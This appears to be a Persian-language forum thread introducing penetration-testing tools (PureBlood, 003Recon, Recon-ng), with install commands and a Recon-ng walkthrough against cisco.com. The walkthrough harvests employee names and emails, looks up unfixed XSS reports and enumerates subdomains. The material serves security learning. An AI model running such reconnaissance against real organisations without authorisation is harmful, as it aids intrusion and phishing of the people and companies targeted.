    ابزار Pure Blood یکی از برنامه هایی محبوب برای پنتستر ها است که ورژن ۲ ان منتشر شد است و در این نسخه شاهد امکانات فوق العاده ای در این ابزار هستیم به دلیل نوشته شدن ان به زبان پایتون این امکان وجود دارد که در هر سیستم عاملی که پایتون نصب شود ابزار قابل اجرا باشد و این مزیت ان است که در سیستم عامل های ویندوز , لینوکس و مک قابل اجرا و استفاده است همچنین این ابزار برای انجام هرچه بهتر عملکرد خود از چندین ابزار دیگر استفاده میکند و در واقع مکملی از ابزار ها است امکانات هویز جستجو صفحات ادمین اسکن امنیتی وب سایت امکان اسکن با wpscan بروت فورس وردپرس دامپ دیتابیس درحملات SQLi تبدیل متن به هش تشخیص سیستم مدیریت محتوا استخراج پسورد …. بایپس Firewall وب اپلیکشن اموزش نصب و استفاده در لینوکس بعد از دریافت کامل ابزار وارد پوشه دانلود شده شوید cd pureblood قبل از اجرا برای نصب پیشنیاز های ابزار دستور زیر را وارد کنید pip install -r requirements.txt برای اجرای ابزار هم از دستور زیر استفاده کنید python pureblood.py این ابزار به صورت زنده قابل استفاده است و نیازی به سویچ ندارد نکته : دقت داشته باشید این ابزار با پایتون نسخه ۳ نوشته شده است و باید با همان نسخه اجرا شود پس قبل اجرا پایتون ورژن ۳ نصب نمایید
  23. امکانات در یافت زیر دامنه ها اسکن دامنه CRLF برسی هدر های حساس برسی ارور های دامنه برسی CORS تست ریدارکت دامنه ف/ی/ل/ت/ر کردن دامنه های فعال برسی فایل های جاوا اسکریپت ارسال جاوا اسکریپت ها اسکن بعضی سرویس ها با nmap برسی وردپرس بودن سایت اسکن سایت وردپرس با wpscan استفاده از ابزار های مختلف مانند sublist3r و در دستور زیر لینک ابزار را جایگزین Link کنید و دستور را در لینوکس خود وارد کنید git clone Link وارده پوشه دانلود شده شوید cd 003Recon سطح دسترسی فایل نصب را بالا ببرید chmod 775 install.sh با دستور زیر نصب را اغاز کنید ./install.sh نحوه اجرا و استفاده از ابزار 003Recon حال برای مثال اجرای برنامه و انجام تست نفوذ از دستور زیر و سایت مورد نظر استفاده میکنیم ./recon.sh google.com
  24. Rednofozi

    Kali Linux

    سلام در این ویدیو میبنید چطوری وردپرس میشه با کالی هک کرد یا حق rednofozi wpscan.mp4 - AnonFile https://www.aparat.com/v/a458w
  25. ابزار Recon-ng را میتوان در واقع یک فریم ورک شناسایی وب با تمام قابلیت های ممکن تعریف کرد که به زبان Python نوشته شده است. این ابزار از لحاظ ماژول های مستقل، کامل است، از طریق دیتابیس فعالیت میکند، عملکرد آن بصورت پیش فرض پیچیده نیست، help قوی ای دارد و در نهایت از لحاظ دستوری و خط فرمان در مرحله بالایی قرار دارد. وجود تمام این قابلیت ها باعث شده است تا ابزار Recon-ng محیطی قدرتمند را که در آن عمل شناسایی بر پایه وب و بصورت متن باز صورت میپذیرد، ایجاد نماید. ظاهر این ابزار و حسی که در کار کردن به کاربر میدهد بسیار شبیه به فریم ورک Metasploit است. اجازه بدهید تا با استفاده از ابزار Recon-ng بسرعت لیستی از داده های مورد نظرمان را جمع آوری نماییم. کار را با استفاده از ماژول whois-poc شروع میکنیم تا در خروجی بما نام کارمندان و آدرس ایمیل آن ها را در شرکت سیسکو بما بدهد. root@kali:~# recon-ng [recon-ng][default] > use recon/contacts/gather/http/api/whois_pocs [recon-ng][default][whois_pocs] > show options Name Current Value Req Description -------- ------------------ ----- --------------- DOMAIN yes target domain [recon-ng][default][whois_pocs] > set DOMAIN cisco.com DOMAIN => cisco.comrecon-ng [recon-ng][default][whois_pocs] > run [*] URL: http://whois.arin.net/rest/pocs;domain=cisco.com [*] URL: http://whois.arin.net/rest/poc/GAB42-ARIN [*] Gary Abbott (gabbott@cisco.com) – whois contact (Concord, TN – United States) … در مرحله بعد میتوانیم با استفاده از recon-ng سورس هایی مانند xssed را برای یافتن آسیب پذیری های XSS که تا کنون گزارش شده اند اما هنوز روی دامین cisco.com این آسیب پذیری ها رفع نشده است، را جستجو کنیم. Recon-ng > use recon/hosts/enum/http/web/xssed Recon-ng [xssed] > set DOMAINcisco.com DOMAIN => cisco.com Recon-ng [xssed] > run [*] URL: http://xssed.com/search?key=cisco.com [*] Mirror: http://xssed.com/mirror/76478/ [*] Domain: www.cisco.com [*] URL: http://www.cisco.com/survey/exit.html?http://xssed.com/ [*] Date published: 16/02/2012 [*] Category: redirect [*] Status: UNFIXED همچنین میتوانیم با استفاده از ماژول google-site دامین های زیر مجموعه بیشتری از cisco.com را بدست آوریم: Recon-ng > use recon/hosts/gather/http/web/google_site Recon-ng [google_site] > set DOMAIN cisco.com DOMAIN => cisco.com Recon-ng [google_site] > run [*] URL: http://www.google.com/search?start=0&filter=0&q=site%3Acisco.com [*] www.cisco.com [*] supportforums.cisco.com [*] learningnetwork.cisco.com [*] newsroom.cisco.com [*] connectedlearninggexchange.cisco.com [*] blogs.cisco.com [*] socialmedia.cisco.com [*] socialviewing.cisco.com [*] meraki.cisco.com برای نمونه میتوان از ماژول ip_neighbour هم نام برد. این ماژول سعی میکند تا آدرس های IP نزدیک دامین هدف را شناسایی کند که در این فرآیند احتمال شناسایی دامین های دیگری نیز وجود دارد. Recon-ng > use recon/hosts/gather/http/web/ip_neighbour Recon-ng [ip_neighbour] > set SOURCE cisco.com SOURCE => cisco.com Recon-ng [ip_neighbour] > run [*] URL: http://www.my-ip-neighbours.com/?domain=cisco.com [*] 72.163.4.161 [*] allgrosys.com [*] apps.cisco.com [*] Broadware.com [*] cisco-returns.com [*] cisco.ag [*] cisco.com [*] cisco.com.akadns.net [*] Cisco.com.az [*] cisco.com.do [*] cisco.com.kz [*] cisco.com.ru [*] cisco.hm بیشتر ماژول ها در ابزار recon-ng به API key هایی نیاز دارند که باید از طرف سرویس دهنده هایشان تهیه شود. همانطور که دیدید کار کردن با ابزار recon-ng سخت نیست و قطعا اگر زمانی را برای کار کردن با ماژول های مختلف آن کنار بگذارید، با تسلط خواهید توانست کارهای بزرگی را با آن انجام دهید.